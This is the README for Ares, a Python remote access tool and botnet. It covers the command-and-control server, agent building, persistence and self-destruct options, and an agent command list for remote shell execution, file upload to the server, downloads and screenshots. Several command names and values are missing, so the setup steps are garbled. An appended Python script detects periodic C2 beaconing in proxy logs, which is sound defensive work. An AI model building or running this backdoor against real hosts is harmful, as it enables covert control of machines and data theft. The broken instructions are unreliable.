Ares - Python Botnet and Backdoor

Ares is a Python-based remote access tool.

It is made of two main programs:
  • A Command and Control server, which is a Web interface to administer the agents
  • An agent program, which is run on the compromised host, and ensures communication with the CnC

The Web interface can be run on any server running Python. The agent can be compiled to native executables using pyinstaller.


Install the Python requirements:
pip install -r requirements.txt
Initialize the database:
cd server
./ initdb
In order to compile Windows agents on Linux, set up Wine (optional):


Run with the builtin (debug) server:
./ runserver -h -p 8080 --threaded
Or run using gunicorn:
gunicorn ares:app -b --threads 20
The server should now be accessible on http://localhost:8080


Run the Python agent (update to suit your needs):
cd agent
Build a new agent to a standalone binary:
./ -p Linux --server http://localhost:8080 -o agent
To see a list of supported options, run ./ -h
./agent/ -h
usage: [-h] -p PLATFORM --server SERVER -o OUTPUT
                  [--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
                  [--max_failed_connections MAX_FAILED_CONNECTIONS]

Builds an Ares agent.

optional arguments:
  -h, --help            show this help message and exit
  -p PLATFORM, --platform PLATFORM
                        Target platform (Windows, Linux).
  --server SERVER       Address of the CnC server (e.g http://localhost:8080).
  -o OUTPUT, --output OUTPUT
                        Output file name.
  --hello-interval HELLO_INTERVAL
                        Delay (in seconds) between each request to the CnC.
  --idle_time IDLE_TIME
                        Inactivity time (in seconds) after which to go idle.
                        In idle mode, the agent pulls commands less often
                        (every <hello_interval> seconds).
  --max_failed_connections MAX_FAILED_CONNECTIONS
                        The agent will self destruct if no contact with the
                        CnC can be made <max_failed_connections> times in a
  --persistent          Automatically install the agent on first run.

Supported agent commands:
<any shell command>
Executes the command in a shell and returns its output.

upload <local_file>
Uploads <local_file> to server.

download <url> <destination>
Downloads a file through HTTP(S).

zip <archive_name> <folder>
Creates a zip archive of the folder.

Takes a screenshot.

python <command|file>
Runs a Python command or local file.

Installs the agent.

Uninstalls the agent.

Kills the agent.

This help.
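
The --hello-interval and --idle_time options in the builder help above mean an idle agent polls the CnC over HTTP at a fixed period, and that regularity is visible in web proxy logs. The following is an added example, not part of Ares or the original post, that flags clients polling one destination at near-constant intervals; the log format, host names and thresholds are assumptions.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit


def sample_log():
    """Constructed proxy log: ws-17 polls every ~60 s, ws-22 browses irregularly."""
    t0 = datetime(2024, 1, 1, 10, 0, 0)
    beacon = [0, 60, 121, 180, 241, 300, 359, 420]   # seconds after t0
    browse = [5, 9, 130, 133, 134, 400, 410, 900]
    rows = [(s, "ws-17", "http://c2.example.test:8080/") for s in beacon]
    rows += [(s, "ws-22", "http://news.example.test/") for s in browse]
    return [f"{(t0 + timedelta(seconds=s)).isoformat()} {c} GET {u}"
            for s, c, u in sorted(rows)]


def find_beacons(lines, min_requests=6, tolerance=0.1, min_regular=0.8):
    """Return [(client, destination, median_gap_seconds)] for regular pollers.

    A pair is flagged when at least min_regular of its request gaps lie
    within +/- tolerance of the median gap, so a short burst of faster
    polling while the agent is active does not hide the idle rhythm.
    """
    seen = defaultdict(list)
    for line in lines:
        ts, client, _method, url = line.split()
        seen[(client, urlsplit(url).netloc)].append(datetime.fromisoformat(ts))

    hits = []
    for (client, dest), stamps in sorted(seen.items()):
        if len(stamps) < min_requests:
            continue  # too few samples to judge periodicity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median = statistics.median(gaps)
        if median <= 0:
            continue
        regular = sum(abs(g - median) <= tolerance * median for g in gaps)
        if regular / len(gaps) >= min_regular:
            hits.append((client, dest, median))
    return hits


if __name__ == "__main__":
    for client, dest, gap in find_beacons(sample_log()):
        print(f"{client} -> {dest}: regular polling every ~{gap:.0f} s")
```

Legitimate software such as update checkers and telemetry clients also polls on a timer, so hits need an allowlist and a check of the destination before escalation.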
